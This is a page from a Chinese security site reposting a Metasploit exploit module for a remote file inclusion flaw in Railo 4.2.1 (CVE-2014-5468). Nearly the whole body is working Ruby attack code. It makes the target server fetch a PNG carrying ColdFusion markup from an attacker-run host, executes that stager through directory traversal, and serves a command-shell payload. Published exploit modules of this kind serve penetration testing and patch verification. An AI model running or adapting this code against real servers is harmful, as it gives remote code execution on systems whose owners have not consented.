首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Railo 4.2.1 Remote File Inclusion
来源:metasploit.com 作者:drone 发布时间:2014-09-12  
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super(update_info(info, 'Name' => 'Railo Remote File Include', 'Description' => ' This module exploits a remote file include vulnerability in Railo, tested against version 4.2.1. First, a call using a vulnerable line in thumbnail.cfm allows an atacker to download an arbitrary PNG file. By appending a .cfm, and taking advantage of a directory traversal, an attacker can append cold fusion markup to the PNG file, and have it interpreted by the server. This is used to stage and execute a fully-fledged payload. ', 'License' => MSF_LICENSE, 'Author' => [ 'Bryan Alexander ', # Discovery/PoC 'bperry' # metasploited ], 'References' => [ ['CVE', '2014-5468'], ['URL', 'http://hatriot.github.io/blog/2014/08/27/railo-security-part-four/'] ], 'Payload' => { 'Space' => 99999, # if there is disk space, I think we will fit 'BadChars' => "", 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic netcat perl ruby python bash telnet' } }, 'Platform' => %w( unix ), 'Targets' => [ [ 'Automatic', { 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 26 2014')) register_options( [ OptString.new('TARGETURI', [true, 'The base URI of the Railo server', '/railo-context/']), OptInt.new('STAGEWAIT', [true, 'Number of seconds to wait for stager to download', 10]) ], self.class) end def check md5 = '6de48cb72421cfabdce440077a921b25' # /res/images/id.png res = send_request_cgi( 'uri' => normalize_uri('res', 'images', 'id.png') # the targeturi is not used in this request ) if !res fail_with(Failure::Unknown, 'Server did not respond') elsif !res.body fail_with(Failure::Unknown, "Server responded without a body: #{res.code} #{res.message}") end new_md5 = Rex::Text.md5(res.body) return Exploit::CheckCode::Appears if new_md5 == md5 Exploit::CheckCode::Safe end def exploit if datastore['SRVHOST'] == '0.0.0.0' fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from another computer') end url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s @shell_name = Rex::Text.rand_text_alpha(15) stager_name = Rex::Text.rand_text_alpha(15) + '.cfm' start_service('Uri' => { 'Proc' => proc do |cli, req| on_request_stager(cli, req) end, 'Path' => '/' + stager_name }) start_service('Uri' => { 'Proc' => proc do |cli, req| on_request_shell(cli, req) end, 'Path' => '/' + @shell_name }) wh = '5000' # width and height res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'thumbnail.cfm'), 'vars_get' => { 'img' => url + '/' + stager_name, 'height' => wh, 'width' => wh } ) if !res fail_with(Failure::Unknown, 'Server did not respond') elsif res.code != 500 fail_with(Failure::Unknown, "Server did not respond with the expected HTTP 500: #{res.code} #{res.message}") end print_status('Waiting for first stage to download...') i = datastore['STAGEWAIT'] while !@staged && i > 0 select(nil, nil, nil, 1) print_status("Waiting for #{i} more seconds...") i = i - 1 end @staged = false if i == 0 fail_with(Failure::Unknown, 'Server did not request the stager.') end hash = Rex::Text.md5("#{url + "/" + stager_name}-#{wh}-#{wh}") # 5000 is width and height from GET hash.upcase! print_status('Executing stager') send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'admin', 'img.cfm'), 'vars_get' => { 'attributes.src' => '../../../../temp/admin-ext-thumbnails/' + hash, 'thistag.executionmode' => 'start' } ) end def on_request_shell(cli, _request) print_status('Sending payload') send_response(cli, payload.encoded, {}) handler(cli) end def on_request_stager(cli, _request) url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name stager = "" stager << "" png = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcS' png << 'JAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==' # A very small PNG file png = Rex::Text.decode_base64(png) stager.each_byte do |b| png << b end png << 0x00 print_status('Sending stage. This might be sent multiple times.') send_response(cli, png, 'Content-Type' => 'image/png') @staged = true handler(cli) end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ManageEngine Eventlog Analyzer
·Rooted SSH/SFTP Daemon Default
·SolarWinds Storage Manager Aut
·HttpFileServer 2.3.x Remote Co
·Onlineon E-Ticaret Database Di
·ALCASAR <= 2.8.1 - Remote Root
·Joomla Spider Contacts 1.3.6 (
·WordPress Slideshow Gallery 1.
·Phpwiki Ploticus Remote Code E
·WWW File Share Pro 7.0 Denial
·ZTE ZXDSL-931VII Unauthenticat
·Apple iOS 7.1.2 Merge Apps Ser
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved